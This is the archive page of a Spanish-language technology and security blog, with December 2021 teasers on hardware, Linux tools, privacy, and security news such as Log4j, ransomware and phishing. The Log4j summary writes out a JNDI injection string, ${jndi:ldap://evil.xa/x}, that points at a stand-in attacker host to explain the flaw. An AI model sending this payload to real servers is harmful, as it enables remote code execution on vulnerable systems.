Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1019
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
▼
2021
(Total:
730
)
-
▼
diciembre
(Total:
103
)
- Tecnología de Intel permite actualizar la BIOS de ...
- La Universidad de Kioto en Japón pierde 77TB de da...
- Redline Stealer es un malware que roba las contras...
- ¿Qué es un dropper? (Malware)
- Fundador de Signal asegura que Telegram es incluso...
- Diferencias entre el cifrado BitLocker y EFS en Wi...
- Mejores programas para reparar, recuperar y ver in...
- TWRP Recovery para teléfonos Android
- Herramientas para realizar ataques Man‑in‑the‑Midd...
- Vulnerabilidad en Azure App Service expone reposit...
- Las 20 mejores herramientas de Hacking de 2021
- Procesadores Intel 12th Alder Lake para el chipset...
- Alertan de una importante Campaña Phishing vía SMS...
- Extensiones Visual Studio Code para programar en ...
- ¿Qué es una APU (CPU + GPU) y un SoC?
- Crean un algoritmo capaz de adivinar el 41% de las...
- DuckDuckGo, la alternativa al buscador Google basa...
- Instalar MacOS Big Sur en una máquina Virtual con ...
- Editores de imágenes de vídeo gratuitos y de códig...
- Desinstalar todas las aplicaciones no deseadas que...
- Reparar tarjeta memoria SD dañada o estropeada
- Instalar aplicaciones Android en Windows 11: WSATo...
- Hackean servidores HP con CPUs AMD EPYC para minar...
- Logrotate: administra los registros (logs) de tu s...
- Las mejores shells para GNU/Linux
- Glosario términos en Linux: vocabulario básico
- Windows 10 versión 21H2 añade protecciones mejorad...
- Instalar varios sistemas operativos autoarrancable...
- Vulnerabilidad test de antígenos permite falsifica...
- Actualización de seguridad importante servidor web...
- Graves vulnerabilidades plugin SEO instalado en má...
- Vulnerabilidades Directorio Activo permiten hackea...
- Ministerio de Defensa de Bélgica es el primer país...
- La memoria DDR5 es apenas un 3% más rápida que la ...
- Actualizaciones de Windows 11 solucionan problemas...
- Disponible distro Hacking WiFi Wifislax de origen ...
- DuckDuckGo prepara navegador web que protegerá la ...
- Amazon patenta una red de cámaras que reconcen a p...
- Los mitos más comunes en ciberseguridad
- Hospital de Asturias (España) afectado por un ataq...
- Cable USB llamado BusKill permite borrar automátic...
- El hackeo con Pegasus para iPhone es uno de los at...
- Resumen de todas las vulnerabilidades de Log4j
- Instalación LineageOS en teléfonos Android
- Gestores de Contraseñas para Android
- Guía SysAdmin para SELinux
- Los mejores gestores de contraseñas gratuitos
- Configurar servidor DLNA para reproducir música y ...
- Instalar Kali Linux en tu teléfono móvil con NetHu...
- pfetch, screenfetch o neofetch : mostrar informaci...
- La estafa del supuesto familiar con la ‘maleta ret...
- Microsoft y Dell prepararan portátiles más reparables
- Contenedores en Firefox para mejorar privacidad al...
- Windows Terminal será la línea de comandos por def...
- Identificada una segunda vulnerabilidad en Log4j q...
- Protocolo WebDav permite conectar unidad de red re...
- Apple publica Tracker Detect para evitar que los u...
- Volvo Cars informa una brecha de seguridad
- Consejos de Seguridad para servidores Linux
- Vulnerabilidad en millones chips de WiFi y Bluetoo...
- Ataque de ransomware Lapsus al Ministerio de Salud...
- Configurar una VPN con Wireguard
- Distribuciones Linux para portátiles antiguos con ...
- Juegos retro para teléfonos móviles Androd e iPhone
- Solucionada vulnerabilidad de seguridad de Western...
- Ladrones de coches están utilizando AirTags de App...
- Cómo activar la autenticación en dos pasos en Goog...
- Detenida en España por estafar al Athletic de Bilb...
- ALPHV BlackCat es el ransomware más sofisticado de...
- Google permitirá ejecutar juegos de Android en Win...
- Google y Microsoft trabajan juntos para mejorar el...
- Vulnerabilidad crítica en Apache Log4j bautizada c...
- Nueva oferta de Microsoft 365 para los usuarios pi...
- Nueva versión de Kali Linux 2021.4 que mejora el s...
- Evitar que tus mails rastreen tus datos personales...
- Cómo configurar la privacidad y seguridad en Signal
- Google demanda a 2 rusos responsables de la botnet...
- Bots se hacen pasar por personal de Twitter para r...
- Importante vulnerabilidad en Grafana: actualizació...
- Descubiertos instaladores KMSPico para activar Win...
- Eltima SDK contiene hasta 27 múltiples vulnerabili...
- Mozilla publica Firefox 95 con mejoras destacadas ...
- Cómo migrar CentOS 8 a Rocky Linux 8, AlmaLinux 8 ...
- Freesync y G-Sync: tecnologías para monitores gami...
- Ansible permite automatizar tareas en distintos se...
- Syncthing es una herramienta gratuita multiplatafo...
- Curiosidades sobre el nuevo CEO de Twitter: 11.000...
- Filtros en Linux: pipes, tuberías: cut, sort, uniq...
- El auge del negocio de los ciberataques de denegac...
- ¿Qué son los (IoC) Indicadores de Compromiso?
- Teléfonos iPhone de empleados del Departamento de ...
- Mejores sistemas de rescate para recuperar fichero...
- Ciberataque denegación de servicio distribuido DDo...
- Hasta 9 routers de marcas muy conocidas acumulan u...
- Plantillas y archivos RTF de phishing contienen ma...
- Nvidia reedita la RTX 2060, ahora con 12 GB de RAM...
- Nueva versión IPFire mejora el rendimiento IPS e i...
- El perro robótico de Xiaomi usa Ubuntu de sistema ...
- WiFi 7 tendrá doble de velocidad (hasta 46 Gbps) y...
- Vulnerabilidad en impresoras HP tras 8 años afecta...
- ► septiembre (Total: 56 )
-
▼
diciembre
(Total:
103
)
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
Tecnología de Intel permite actualizar la BIOS de un sistema Linux sin tener que reiniciar
Intel está terminando el desarrollo de la función Platform Firmware Runtime and Telemetry Drivers (PFRUT), que combinado con el kernel de Linux 5.17, permite al sistema operativo actualizar el firmware del sistema, como la UEFI o la BIOS de una placa base, sin necesidad de reiniciar el sistema con el fin de eliminar el tiempo de inactividad.
La Universidad de Kioto en Japón pierde 77TB de datos tras un error en la copia de seguridad
La Universidad de Kioto, uno de los principales institutos de investigación de Japón, está de luto, y es que lo que debería ser algo tan rutinario como realizar una copia de seguridad, derivó en la pérdida de aproximadamente 34 millones de archivos pertenecientes a 14 grupos de investigación diferentes que habían estado utilizando el sistema de supercomputación de la escuela. Es decir, que perdieron nada menos que 77 terabytes de datos en este procedimiento rutinario.
Redline Stealer es un malware que roba las contraseñas guardadas del navegador
Por comodidad, son muchos los usuarios que guardan sus contraseñas a través de las herramientas que ofrecen navegadores como Chrome, Edge, Safari y demás. Un almacén al que acceder fácilmente a las contraseñas sin tener que preocuparnos de acordarnos de ellas. Sin embargo, esto puede ser un arma de doble filo, ya que los gestores de contraseñas de nuestro navegador pueden no ser la mejor opción, y el malware 'Redline Stealer' lo demuestra.
¿Qué es un dropper? (Malware)
Los droppers son un subtipo de malware que tiene la finalidad de “droppear” (del inglés dropper, que significa liberar) otro archivo ejecutable malicioso. Al igual que las amenazas del tipo troyano, categoría en la cual están incluidos los droppers, a simple vista puede verse como inofensivo, hasta que recibe la orden de descargar el malware en cuestión. Usualmente, este tipo de malware suele incluirse dentro de archivos comprimidos enviados como adjuntos en correos de phishing.
Fundador de Signal asegura que Telegram es incluso menos seguro que Facebook Messenger
Moxie Marlinspike, fundador de Signal, una plataforma de mensajería que se hizo popular por asegurar a sus usuarios una gran privacidad ha dicho en Twitter que le sorprende que muchos medios sigan hablando de Telegram como una herramienta de "mensajería encriptada". Considera que, aunque Telegram ofrece muchas características atractivas, "no hay una opción peor en lo que respecta a la privacidad y la recopilación de datos", ha dicho Marlinspike. Ya que Telegram no utiliza por defecto el cifrado de extremos a extremo, excepto si usas los Chats Secretos.
Diferencias entre el cifrado BitLocker y EFS en Windows
Generalmente consideramos que los archivos almacenados en nuestros discos duros están seguros ya que están protegidos por la contraseña de inicio de sesión. No obstante, si nos roban el ordenador o el disco duro podrían estar en peligro. Así, por ejemplo, retirando ese disco duro y conectándolo a otro equipo podría ver el contenido que tenemos almacenado. Una de las herramientas gratuitas que podemos utilizar para esta tarea es VeraCrypt, aunque hay que señalar que Windows también tiene 2 sistemas de cifrado nativos que son BitLocker y EFS, con sus respectivas características y diferencias.
Mejores programas para reparar, recuperar y ver información de un disco duro dañado
Dentro de las diferentes desgracias que le puede ocurrir a un PC, la avería del disco duro es una de las peores. No solo porque podamos perder los datos que teníamos almacenados (que también), sino porque que además en el peor de los casos tendremos que comprar un disco nuevo, desmontar el ordenador y sustituirlo. Lo ideal es clonar la unidad afectada para poder trabajar con ella con total seguridad.
Herramientas para realizar ataques Man‑in‑the‑Middle (MITM)
Man-in-the-Middle (MitM), que en español significa “hombre en el medio”, es un tipo de ataque destinado a interceptar, sin autorización, la comunicación entre dos dispositivos (hosts) conectados a una red. Este ataque le permite a un agente malintencionado manipular el tráfico interceptado de diferentes formas, ya sea para escuchar la comunicación y obtener información sensible, como credenciales de acceso, información financiera, etc., o para suplantar la identidad de alguna de las partes
Vulnerabilidad en Azure App Service expone repositorios Git desde hace 4 años
Se ha descubierto un fallo de seguridad en Azure App Service de Microsoft que resultó en la exposición del código fuente de las aplicaciones de los clientes escritas en Java, Node, PHP, Python y Ruby durante al menos cuatro años desde septiembre de 2017. Microsoft soluciona error NotLegit que permitía ver el código fuente de las apps utilizando "Local Git" en Azure App Service para Linux en App escritas PHP, Python, Ruby o Node ya que repositorio local “/.git” era visible públicamente.
Las 20 mejores herramientas de Hacking de 2021
En un ranking elaborado por Kitploit, nos muestran las 20 herramientas más populares (con más visitas) durante el 2021. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad. Destacan herramientas de Information Gathering, ingeniería social (phishing), entre otras
Procesadores Intel 12th Alder Lake para el chipset Z690, H670, B660 y H610
Una placa base Z690 puede ser tu mejor aliada para las nuevas CPU Intel Core de 12ª generación (Alder Lake). Estamos ante unos procesadores con un socket totalmente nuevo, el LGA1700, y que además estrenan el soporte para memorias DDR5. Son toda una revolución que marcará el mercado del PC en toda esta nueva década, por lo que comprar una buena placa base es algo más importante que nunca.
Alertan de una importante Campaña Phishing vía SMS clientes mensajería MRW
Se ha detectado una campaña de SMS fraudulentos (smishing) suplantando a la compañía de envíos MRW. La propia empresa a través de su perfil oficial de Twitter informa estar sufriendo una campaña de smishing donde tratan de suplantarles pero utilizando DATOS REALES como NOMBRE Y APELIDOS. A través de estos SMS fraudulentos, se envía un localizador de envío al usuario con un enlace que le redirige a una página fraudulenta con el fin de que pague unos supuestos gastos de envío de un paquete enviado por MRW. El dominio envios-mrw.[]com no es de MRW, es FALSO. El mensaje te dice que tienes que abonar los gastos de un envío que estas esperando y que para hacerlo tienes que ingresar en una URL donde te explican cómo hacer el pago.
Extensiones Visual Studio Code para programar en C o C++
Gracias a los IDE de programación (una serie programas diseñados para ayudarnos a programar de manera más eficiente, con menos errores, y con distintas ayudas y sistemas de detección y corrección de errores) los programadores pueden llevar a cabo sus proyectos de manera más eficiente y con menos probabilidades de cometer fallos y errores. Y, cuanto más especializado esté ese IDE en el lenguaje que vamos a utilizar, mucho mejor. Visual Studio Code es un programa es un editor de texto plano desarrollado por Microsoft como software OpenSource y totalmente gratuito para todo tipo de usuarios para que cualquiera programar en prácticamente cualquier lenguaje.
¿Qué es una APU (CPU + GPU) y un SoC?
Todos sabemos que la CPU es la Unidad Central de Procesamiento (Central Processing Unit) y se asemeja al cerebro del ordenador, manejando la mayor parte del procesamiento. Sin embargo, las CPU no suelen ser muy buenas haciendo los cálculos para los gráficos.
Crean un algoritmo capaz de adivinar el 41% de las veces tu PIN del cajero
DuckDuckGo, la alternativa al buscador Google basado en la privacidad, bate récords
Mejorar la privacidad al navegar es algo que tienen muy en cuenta cualquiera que entre en una página, se registre en un foro o haga simplemente una búsqueda en la red. Y la mejor prueba la tenemos con el uso de DuckDuckGo, que es la alternativa a Google más popular para evitar que los datos personales puedan filtrarse. De hecho, ha vuelto a batir récords. Esto no hace más que confirmar que la privacidad importa, y mucho.
Instalar MacOS Big Sur en una máquina Virtual con VirtualBox
¿Está interesado en ejecutar macOS Big Sur o Monterey desde una PC con Windows? Si no quieres gastar dinero en una Mac, puedes usar una máquina virtual y aun así probar macOS, gracias a VirtualBox. Ejecutarás VirtualBox de forma nativa en su computadora con Windows e instalará macOS como un sistema operativo invitado dentro de VirtualBox.
Editores de imágenes de vídeo gratuitos y de código libre
El software libre es un movimiento político y social que lucha por la libre disponibilidad, estudio, modificación y redistribución del código fuente empleado en programas y aplicaciones. Fue definido oficialmente en 1986, cuando Richard Stallman estableció las conocidas cuatro libertades (la cero fue añadida después), pero ya existía de facto debido a que el proyecto GNU echó a andar en 1983 y a que en décadas anteriores no era raro que el código fuente fuera compartido entre distintos desarrolladores.
Desinstalar todas las aplicaciones no deseadas que se incluyen por defecto en Windows 10 y 11
Hasta que Microsoft tome conciencia de la conveniencia de ofrecer un Windows 10 limpio como están pidiendo sus usuarios, el Bloatware campa a sus anchas por el ecosistema . Candy Crush, Spotify, Trip Advisor, Bubble Witch 3 Saga, Amazon, Disney Magic Kingdoms, Netflix, Skype, Cooking Fever, Fitbit Coach… la lista de aplicaciones incluidas por Microsoft en Windows 10 es ya interminable. O&O AppBuster es una app gratuita, portable y fácil de usar, además extremadamente ligera. El archivo .exe pesa poco más de 1 MB,
Reparar tarjeta memoria SD dañada o estropeada
Las memorias o tarjetas micro SD se han vuelo tremendamente populares en los últimos tiempos, y como herramienta de uso diario que son, no son pocas las que se averían, se corrompen o simplemente fallan y dejan de funcionar.
Instalar aplicaciones Android en Windows 11: WSATools y WSAPacman
Hackean servidores HP con CPUs AMD EPYC para minar Raptoreum gracias a la vulnerabilidad Log4Shell
Raptoreum, es noticia debido a que los servidores HP, dotados de procesadores AMD EPYC, han sido hackeados aprovechando que eran vulnerables al exploit Log4J, lo que permitió que los atacantes accedieran a estos sistemas para aprovechar el enorme potencial de las CPUs EPYC para minar esta criptomoneda. Extraen más de $ 100,000 en 8 días
Logrotate: administra los registros (logs) de tu sistema Linux
En el mundo de los sistemas UNIX y GNU/Linux tiene un buen puñado de herramientas increíbles, que facilitan el día a día de las personas administradoras de sistemas. Una de ellas es logrotate. Esta utilidad implementa una variedad de políticas de administración de registros y es estándar en todas las distribuciones GNU/Linux. También se puede instalar, si así se desea, en sistemas Solaris, HP-UX o AIX
Las mejores shells para GNU/Linux
Las mejores shell para GNU/Linux. En nuestros sistemas favoritos, comparados con otros privativos, es mucho más frecuente utilizar la consola de comandos, con más motivo aún si eres desarrollador o administrador de sistemas. Las shell de las que vamos a hablar son las más populares, estas son tsch, fish, Korn Shell, Z Shell y como no, Bash.
Windows 10 versión 21H2 añade protecciones mejoradas contra ransomware y malware
Microsoft sigue apostando por la seguridad en su plataforma Windows y su última propuesta está encaminada para ayudar a los administradores de sistemas y que estos determinen si la configuración que tienen aplicada es la idónea tomando como referencia las recomendadas por Microsoft. Gracias a Microsoft Security Compliance Toolkit, un conjunto de opciones de configuración desarrolladas en base a las aportaciones tanto de los equipos de ingeniería de la empresa pero también por partners y clientes.
Instalar varios sistemas operativos autoarrancables en un pendrive
Tener una unidad pendrive USB desde la cual podamos arrancar un sistema operativo u otro puede ser verdaderamente interesante. Gracias a una unidad de USB, podremos llevar varias distribuciones de Linux o distintos sistemas de instalación de Windows, para de esta manera lograr tener diferentes formas de arrancar nuestro ordenador desde fuerza del almacenamiento interno del mismo.
Vulnerabilidad test de antígenos permite falsificar el resultado mediante Bluetooth
Una investigación del proveedor de ciberseguridad F-Secure ha encontrado y ayudado a corregir fallos de diseño de un test doméstico de antígenos para detectar la COVID-19 de la marca Ellume. Los fallos descubiertos habrían permitido a un individuo falsificar un resultado certificable de la prueba a través de Bluetooth. Ellume cuenta con la autorización de ser usada en caso de emergencia en Estados Unidos para diagnosticar coronavirus.
Actualización de seguridad importante servidor web httpd Apache 2.4.51 e inferiores (mod_lua y ProxyRequests)
El 20 de diciembre de 2021, Apache emitió oficialmente un aviso de
seguridad para corregir múltiples vulnerabilidades. Los números de
vulnerabilidad incluidos son: CVE-2021-44224, CVE-2021-44790, el nivel
de vulnerabilidad es de alto riesgo. La primera vulnerabilidad sólo afecta si tenemos la directiva ProxyRequests On y la segunda si usamos el módulo mod_lua activado (por defecto se encuentra deshabilitado). Las dos vulnerabilidades se encuentran corregidas en Apache 2.4.52. No se conocen exploits públicos por el momento.
Graves vulnerabilidades plugin SEO instalado en más de 800 mil webs de WordPress
La seguridad de unos 800.000 sitios web que utilizan WordPress está en peligro. El popular complemento All in One SEO, que es empleado por más de 3 millones de sitios web para mejorar el posicionamiento en motores de búsqueda, presenta dos vulnerabilidades críticas. Las mismas han sido abordas en una actualización lanzada el pasado 7 de diciembre, pero los webmasters están tardando en aplicar este parche.
Vulnerabilidades Directorio Activo permiten hackear controlador de dominio en Windows
Microsoft ha publicado un aviso fuera de ciclo de dos vulnerabilidades publicadas en noviembre y que, combinadas, podrían permitir a un atacante la escalada de privilegios de dominio. Las pruebas de concepto se han dado a conocer públicamente en diciembre.La cadena de vulnerabilidades (NoPaC, sAMAccountName) que está pasando algo desapercibida pero mediante la cual cualquier persona dentro de la red podría usar para hackear un DC. Hablamos de CVE-2021-42287 y CVE-2021-42278
Ministerio de Defensa de Bélgica es el primer país víctima de la vulnerabilidad Log4j
La vulnerabilidad Log4Shell parece estar lejos de dejar de ser un dolor de cabeza para gran parte de las plataformas de Internet. Grupos de ciberdelincuentes intentan explotarla miles de veces por segundo y, en ocasiones, consiguen lo que buscan. El Ministerio de Defensa de Bélgica se ha convertido en el primer país de la OTAN en ser victima de este fallo de seguridad.
La memoria DDR5 es apenas un 3% más rápida que la DDR4 y es más del doble de cara
La memoria RAM DDR5 se presentó como gran novedad, pero DDR4 sigue
siendo competitiva y el impacto en videojuegos es muy pequeño. La
noticia se centra en las memorias DDR5 de 6000 MHz y aquellas DDR4 a 3.200 MHz, ¡solo un 2% más de FPS! De 129,19 FPS a 133,44 FPS en juegos populares cuando el precio es más del doble. 32GB de DDR4 cuestan unos 150€, mientras que el mismo kit 32GB en DDR5, más del doble, el precio mínimo de 470€.
Actualizaciones de Windows 11 solucionan problemas rendimiento y cuelgues inesperados
Microsoft reconoció recientemente la existencia de dos errores en Windows 11 que podían provocar, en ciertas situaciones, pérdidas importantes de rendimiento, que se manifestaban en forma de ralentizaciones muy marcadas que afectaban a las unidades SSD, y también generaban cierres espontáneos de ciertas aplicaciones, lo que conocemos popularmente como «crasheos».
Disponible distro Hacking WiFi Wifislax de origen Español edición final 2021
Wifislax64 es la versión de la
popular distribución de origen Español basada en Linux Slackware creada
por USUARIONUEVO que mantiene viva la comunidad de SeguridadWireless. Se
trata de un
sistema operativo muy utilizado para realizar pruebas en redes
inalámbricas, comprobar la seguridad de claves Wi-Fi al disponer de una
gran cantidad de diccionarios WPA y WPA2 de los populares routers. Incluye actualizaciones para Firefox 95, Chrome 96, Tor 11 , Websploit 4.0 , Kodi , Wine , Burp Suite LibreOffice, Social Engineer Toolkit (SET) 8.0.3, Metasploit kit-6.1.20, etc
DuckDuckGo prepara navegador web que protegerá la privacidad y será más rápido que Chrome
Amazon patenta una red de cámaras que reconcen a personas "sospechosas"
Amazon quiere crear una serie de red de cámaras que reconozcan a las personas consideradas "sospechosas": Estas son todas las patentes que podrían hacerlo posible Ring, empresa adquirida por Amazon que vende sistemas de timbres para casas con cámaras de vigilancia integradas, ha estado investigando el reconocimiento facial y otras tecnologías de identificación biométrica. La empresa por ahora no ofrece estas capacidades, pero las patentes presentadas sugieren que es una posibilidad en el futuro. Pero la patente describe la posibilidad de que las personas envíen una alerta dentro de una aplicación a los vecino.
Los mitos más comunes en ciberseguridad
Incluso con la creciente conciencia sobre la ciberseguridad, prevalecen muchos mitos al respecto. Estos conceptos erróneos pueden ser una barrera para la seguridad efectiva. El primer paso para garantizar la seguridad de su negocio es separar la información falsa, los mitos y los rumores de la verdad.
Hospital de Asturias (España) afectado por un ataque de ransomware
Desde el comienzo de la pandemia los hospitales han protagonizado diversos casos de ataques ransomware. El ataque ransomware causa estragos en el hospital más importante de Asturias: obliga a posponer citas y a reinstalar el software, La caída del sistema colapsó los equipos que monitorizan la pandemia y que organizan la realización de PCR. No es la primera vez que los ciberatacantes apuntan hacia el sistema sanitario. A principios de 2020 conocimos el del Hospital de Torrejón y en septiembre del año pasado otro ataque provocaba colapsos en el Moisès Broggi de Barcelona
Cable USB llamado BusKill permite borrar automáticamente contenido del portátil en caso pérdida o robo
Ya sea por robo o pérdida.el proyecto
BusKill evita que la información del usuario quede
al aire si tiene un problema de este tipo. En concreto, mediante el
empleo de un 'gadget' USB que permite bloquear el ordenador en caso
de acabar desconectado e incluso provocar que queden destruidos ante
amenazas.
El hackeo con Pegasus para iPhone es uno de los ataques más sofisticados de la historia
El hackeo de Pegasus a iPhone, ahora ya parcheado, se encuentra entre los ataques más sofisticados vistos en los últimos años. Los empleados de Google de Project Zero lo han descrito como «uno de los exploits técnicamente más sofisticados» que jamás hayan visto después de estudiar el exploit de seguridad de iMessage que ha aparecido repetidamente en los titulares. Dicen que la infame herramienta del Grupo NSO está a la par de lo que cabría esperar de las herramientas de espionaje de los estados nacionales
Resumen de todas las vulnerabilidades de Log4j
Las versiones de Log4j anteriores a 2.16.0 están sujetas a una vulnerabilidad de ejecución remota de código a través del analizador ldap JNDI. El resumen de la vulnerabilidad anterior es que un servidor que utilice la librería de java vulnerable, cuando reciba una petición en alguno de los campos que necesitaría tratar (el User-Agent en este caso), parsearía el contenido (${variable} => ${jndi:ldap://evil.xa/x}), entraría log4j para su tratamiento, realizaría la query ldap hacia el destino (evil.xa) y éste le respondería con la clase maliciosa ejecutando el código existente en la misma.
Instalación LineageOS en teléfonos Android
Gestores de Contraseñas para Android
Nuestro smartphone Android puede hacer muchas cosas y una de ellas es generar, proteger y usar contraseñas seguras. Un tres en uno que nos ayuda a organizar mejor esta información y a usarla de manera más óptima para evitar que otros puedan entrar a nuestras cuentas. Hay muchos gestores de contraseñas si buscamos en Google Play pero sólo unos pocos son los que luchan para quedarse en nuestro móvil. La variedad es buena y con la lista que os traemos hoy, elijas lo que elijas vas a encontrar una aplicación competitiva.
Guía SysAdmin para SELinux
Desde hace un tiempo los administradores de sistemas y también los usuarios domésticos nos hemos tenido que acostumbrar a trabajar con SELinux; seguro habrán oído de él, ese módulo de seguridad, medio desconocido y que por norma todos nos dicen que deshabilitamos recién hemos instalado el sistema operativo en turno.
Los mejores gestores de contraseñas gratuitos
Un gestor de contraseñas es, fundamentalmente, un almacén digital cifrado que almacena a buen recaudo información de inicio de sesión de diversos servicios online. A partir de ese concepto básico, podemos ir sumando características que refuerzan su utilidad: sincronización entre dispositivos, contraseñas maestras, etc.
Configurar servidor DLNA para reproducir música y peliculas
Instalar Kali Linux en tu teléfono móvil con NetHunter
Nethunter es la solución móvil de Kali Linux. Es un proyecto Open Source para Android y por supuesto para dispositivos que corren bajo ese sistema operativo. Ha sido desarrollado en conjunto por Offensive Security y por un miembro de la comunidad, conocido como “BinkyBear”. No es compactible con Iphone y su sistema operativo IOS. Según su página oficial y traducido al español, Nethunter nos proporciona lo siguiente: